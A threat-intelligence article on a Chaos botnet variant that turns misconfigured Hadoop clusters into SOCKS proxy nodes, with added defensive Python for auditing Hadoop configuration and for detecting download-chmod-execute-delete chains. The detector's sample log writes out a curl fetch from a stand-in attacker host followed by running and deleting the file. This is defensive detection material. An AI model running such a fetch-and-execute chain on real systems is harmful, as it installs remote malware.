A new variant of the Chaos botnet malware is shifting its focus from home routers and edge devices to misconfigured cloud infrastructure, turning vulnerable Hadoop and similar services into powerful, anonymized nodes for criminal operations. This evolution reflects a broader trend: modern botnets increasingly abuse cloud platforms not only for distributed denial-of-service (DDoS) attacks, but also as high‑bandwidth, low‑friction proxy networks.
Chaos malware shifts from home routers to cloud environments
According to research by Darktrace, the updated Chaos botnet was recently observed attacking a honeypot that emulated a poorly secured Hadoop cluster. The cluster intentionally exposed a remote code execution path, mirroring common misconfigurations found in real‑world cloud deployments.
The intrusion started with an HTTP request to the Hadoop service that triggered the creation of a new application. Within this legitimate operation, the attackers embedded a chain of shell commands: download of a Chaos agent binary from the adversary‑controlled host pan.tenire[.]com, assignment of full permissions via chmod 777, execution of the file, and subsequent deletion to reduce forensic traces on disk.
This attack flow is typical for cloud‑focused botnets. An exposed or overly permissive service—whether Hadoop, Docker, Kubernetes, or another container/orchestration component—serves as the initial foothold. Once code execution is obtained, the malware deploys itself and enrols the cloud server as part of the botnet, often without immediate impact visible to the victim organization.
Origin of the Chaos botnet and links to Kaiji and Chinese infrastructure
Chaos malware was first documented in depth by Lumen Black Lotus Labs in 2022 as a cross‑platform threat targeting both Windows and Linux. Its earlier variants supported remote command execution, modular payload download, SSH credential brute‑forcing for lateral movement, cryptocurrency mining, and multi‑protocol DDoS attacks over HTTP, TLS, TCP, UDP, and WebSocket.
Researchers have long suspected that Chaos represents an evolution of the Kaiji DDoS botnet family, which previously targeted, among other things, misconfigured Docker instances. Overlaps in code patterns, combined with the use of infrastructure hosted in China and the presence of Chinese‑language strings, have led to hypotheses of possible Chinese‑speaking operators, though no definitive attribution has been established.
The domain infrastructure in the latest Chaos activity intersects with earlier campaigns by the Silver Fox threat group. This actor reportedly used pan.tenire[.]com to distribute lure documents and the ValleyRAT malware, activity that Seqrite Labs associated with an operation dubbed Operation Silk Lure. The recurring use of the same domain illustrates a common criminal pattern: recycling trusted infrastructure across multiple malware families to maximize return on investment.
Technical changes: no self-propagation, new SOCKS proxy capability
The payload observed on compromised cloud servers is a 64‑bit ELF binary, representing a reworked and updated Chaos variant. Darktrace’s analysis indicates that core capabilities have been preserved, but the architecture has been significantly modified and earlier code segments linked to Kaiji have been rewritten or heavily refactored.
The most notable change is the removal of self‑propagation features. The new Chaos build no longer performs SSH brute‑force attacks or exploits router vulnerabilities on its own. Instead, the developers have introduced native SOCKS proxy functionality, allowing a compromised server to relay arbitrary network traffic on behalf of the attacker.
A SOCKS proxy can forward almost any type of network connection through the infected machine, effectively masking the true IP address of the operator. For defenders, this dramatically complicates attribution and response: malicious activity appears to originate from legitimate cloud provider IP space, often with good historical reputation, while the real command infrastructure may sit several proxy “hops” further downstream.
Monetization model: from DDoS‑for‑hire to criminal proxy services
The addition of SOCKS proxy capabilities suggests a shift in the Chaos botnet monetization strategy. Earlier versions likely generated revenue primarily through cryptomining and paid DDoS‑for‑hire services. By contrast, the new variant is well positioned to support proxy‑as‑a‑service offerings on underground markets, a trend also seen in other botnets such as AISURU.
For organizations, this means that a compromised cloud instance may now be used not only to launch DDoS attacks, but also as an anonymization layer for phishing campaigns, credential stuffing, intrusion attempts, command‑and‑control obfuscation, or evasion of geo‑ and IP‑based access controls. Even if no internal data is stolen, victims risk blacklisting of their IP ranges, damage to brand reputation, and potential legal or regulatory scrutiny when their infrastructure is implicated in downstream attacks.
How to protect cloud infrastructure from Chaos and similar botnets
Secure configuration and strong access control
The primary enabler of Chaos infections is misconfigured cloud services. Organizations should strictly limit remote code execution capabilities in Hadoop, Docker, Kubernetes, and related platforms; disable anonymous or unnecessary access; and apply the principle of least privilege to all service accounts and management interfaces. Administrative consoles must be isolated on private network segments and protected with multi‑factor authentication and robust logging.
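As an added example (not code from the article or from Darktrace's research), the following Python script audits a Hadoop core-site.xml for the settings that leave a cluster accepting any claimed identity over RPC and HTTP, which is what makes the kind of anonymous application submission described above possible. The property names are real Hadoop configuration keys and the values checked are Hadoop's own insecure defaults; the two sample configuration files, the hostnames and the file paths are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Settings a practitioner checks first on an exposed Hadoop cluster.
# key -> (value required to pass, what the weak value or Hadoop's default means in practice)
REQUIRED = {
    "hadoop.security.authentication": ("kerberos", "RPC clients may claim any username (default: simple)"),
    "hadoop.security.authorization": ("true", "no service-level ACLs are enforced on RPC calls (default: false)"),
    "hadoop.http.authentication.type": ("kerberos", "web UIs and REST APIs are unauthenticated (default: simple)"),
    "hadoop.http.authentication.simple.anonymous.allowed": ("false", "anonymous HTTP clients are accepted (default: true)"),
}

# Constructed example of a weak core-site.xml: simple auth, authorization off, HTTP settings left at defaults.
WEAK_CORE_SITE = """<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://nn.internal.example:8020</value></property>
  <property><name>hadoop.security.authentication</name><value>simple</value></property>
  <property><name>hadoop.security.authorization</name><value>false</value></property>
</configuration>
"""

# Constructed hardened counterpart: every checked key set explicitly to its secure value.
HARDENED_CORE_SITE = """<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://nn.internal.example:8020</value></property>
  <property><name>hadoop.security.authentication</name><value>kerberos</value></property>
  <property><name>hadoop.security.authorization</name><value>true</value></property>
  <property><name>hadoop.http.authentication.type</name><value>kerberos</value></property>
  <property><name>hadoop.http.authentication.simple.anonymous.allowed</name><value>false</value></property>
</configuration>
"""


def load_properties(xml_text):
    """Parse Hadoop's <property><name/><value/></property> layout into a dict."""
    root = ET.fromstring(xml_text)
    props = {}
    for prop in root.findall("property"):
        name = prop.findtext("name")
        value = prop.findtext("value")
        if name is not None:
            props[name.strip()] = (value or "").strip()
    return props


def audit(xml_text):
    """Return one finding string per checked key that is missing or not set to the required value.

    A missing key is a finding because Hadoop falls back to the insecure default.
    """
    props = load_properties(xml_text)
    findings = []
    for key, (required, consequence) in REQUIRED.items():
        actual = props.get(key)
        shown = actual if actual is not None else "<unset, insecure default applies>"
        if actual is None or actual.lower() != required:
            findings.append(f"{key}={shown} (want {required}): {consequence}")
    return findings


if __name__ == "__main__":
    for label, xml_text in (("weak", WEAK_CORE_SITE), ("hardened", HARDENED_CORE_SITE)):
        problems = audit(xml_text)
        print(f"{label}: {len(problems)} finding(s)")
        for line in problems:
            print("  -", line)
```

Running the script reports four findings for the weak file (two wrong values, two keys missing and therefore defaulting to their weak setting) and none for the hardened one. The same check can be pointed at yarn-site.xml or mapred-site.xml with a different REQUIRED table; the parser is identical because every Hadoop site file shares the same property layout.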
Network and behavior monitoring for early detection
Effective defense requires continuous monitoring via NDR/EDR and cloud security solutions capable of detecting anomalous network behavior. Suspicious indicators include unexpected outbound connections to rare or newly registered domains, sudden spikes in TCP/UDP traffic volumes, or unusual HTTP bursts to atypical destinations. On Linux servers, red flags may include wget/curl calls to unfamiliar external URLs, frequent use of chmod 777, and the appearance or rapid deletion of unknown ELF binaries.
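The command chain described in the intrusion walkthrough (download, chmod 777, execute, delete) and the Linux red flags listed in this section can be turned into a simple correlation rule. The following Python detector is an added example and not code from the article or from Darktrace: it runs over constructed process-execution log lines (the log format, the file paths and the attacker.example and repo.internal.example hostnames are all assumptions), groups commands by the file they touch, and raises a finding only when a file fetched from a non-allowlisted host is later executed within a short window, so a routine package download by an administrator is not flagged.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed process-execution events (shape loosely modelled on an auditd/EDR feed, not a
# real log format). The first four lines reproduce the download -> chmod 777 -> execute ->
# delete chain; the last two are a benign package fetch by an administrator.
SAMPLE_EVENTS = """\
2024-05-02T09:14:01Z user=yarn pid=4021 cmd="bash -c 'curl -fsSL -o /tmp/.x http://attacker.example/x'"
2024-05-02T09:14:02Z user=yarn pid=4022 cmd="chmod 777 /tmp/.x"
2024-05-02T09:14:03Z user=yarn pid=4023 cmd="/tmp/.x"
2024-05-02T09:14:04Z user=yarn pid=4024 cmd="rm -f /tmp/.x"
2024-05-02T09:20:10Z user=hdfs pid=4100 cmd="wget -q https://repo.internal.example/hadoop-3.3.6.tar.gz -O /opt/pkg/hadoop.tar.gz"
2024-05-02T09:21:00Z user=hdfs pid=4101 cmd="tar -xzf /opt/pkg/hadoop.tar.gz -C /opt"
"""

ALLOWED_HOSTS = {"repo.internal.example"}  # constructed allowlist of approved download sources
WINDOW = timedelta(minutes=10)              # later stages must follow the download within this window

EVENT_RE = re.compile(r'^(?P<ts>\S+) user=(?P<user>\S+) pid=(?P<pid>\d+) cmd="(?P<cmd>.*)"$')
WRAPPER_RE = re.compile(r"^(?:/bin/)?(?:ba)?sh\s+-c\s+")  # unwrap "bash -c '...'" style invocations
URL_RE = re.compile(r"https?://\S+")
OUTPUT_RE = re.compile(r"(?:^|\s)(?:-o|-O|--output)\s+(?P<path>\S+)")
CHMOD_RE = re.compile(r"\bchmod\s+(?:-\S+\s+)*(?P<mode>[0-7]{3,4}|[ugoa]*\+[rwxX]+)\s+(?P<path>\S+)")


def parse_events(text):
    """Turn raw lines into dicts with a datetime, user, pid and the unwrapped command."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue
        cmd = WRAPPER_RE.sub("", m["cmd"]).strip().strip("'\"")
        events.append({"ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
                       "user": m["user"], "pid": int(m["pid"]), "cmd": cmd})
    return events


def classify(cmd):
    """Map one command to (stage, file path, download host) or None if it is not a stage we track."""
    argv = cmd.split()
    if not argv:
        return None
    tool = argv[0].rsplit("/", 1)[-1]
    if tool in ("curl", "wget"):
        url, out = URL_RE.search(cmd), OUTPUT_RE.search(cmd)
        if url and out:
            return ("download", out["path"], urlparse(url.group(0)).hostname)
        return None
    if tool == "chmod":
        m = CHMOD_RE.search(cmd)
        return ("chmod", m["path"], None) if m else None
    if tool == "rm":
        targets = [a for a in argv[1:] if not a.startswith("-")]
        return ("delete", targets[-1], None) if targets else None
    if argv[0].startswith(("/", "./")):
        return ("execute", argv[0], None)
    return None


def detect(text):
    """Correlate stages per file path; report chains that download from an untrusted host and execute."""
    chains = {}
    for ev in parse_events(text):
        hit = classify(ev["cmd"])
        if hit is None:
            continue
        stage, path, host = hit
        if stage == "download":
            chains[path] = {"path": path, "host": host, "user": ev["user"],
                            "stages": ["download"], "first": ev["ts"], "last": ev["ts"]}
            continue
        chain = chains.get(path)
        if chain is None or ev["ts"] - chain["last"] > WINDOW:
            continue  # no recent download of this file; out of scope for this rule
        chain["stages"].append(stage)
        chain["last"] = ev["ts"]

    findings = []
    for chain in chains.values():
        if chain["host"] in ALLOWED_HOSTS or "execute" not in chain["stages"]:
            continue
        # Anti-forensic deletion of the executed file raises the severity.
        chain["severity"] = "high" if "delete" in chain["stages"] else "medium"
        findings.append(chain)
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f['severity']}] user {f['user']} fetched {f['path']} from {f['host']}; "
              f"stages {' -> '.join(f['stages'])} within {f['last'] - f['first']}")
```

On the sample feed the rule produces a single high-severity finding for /tmp/.x and stays silent on the administrator's wget from the allowlisted repository. In production the same correlation is usually expressed in the SIEM or EDR query language, keyed on the parent process (here a YARN container launcher) in addition to the file path, and the allowlist is replaced by the organisation's approved artifact mirrors.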
Vulnerability management and incident readiness
Regular operating system and middleware patching, combined with configuration audits against standards such as CIS Benchmarks, significantly reduces the attack surface. Organizations should maintain and exercise an incident response plan specifically covering cloud workloads, including predefined procedures to rapidly isolate compromised nodes, rotate credentials, and redeploy from clean, tested backups.
The rapid evolution of the Chaos botnet underscores how quickly threat actors adapt to cloud adoption and growing demand for traffic anonymization. DDoS is no longer the sole or even primary risk; any exposed or misconfigured cloud service can be transformed into a high‑value node in a global proxy network. Organizations that proactively harden their cloud configurations, enhance monitoring, and invest in staff training are far better positioned to prevent their own infrastructure from becoming an invisible asset in someone else’s cybercrime operation.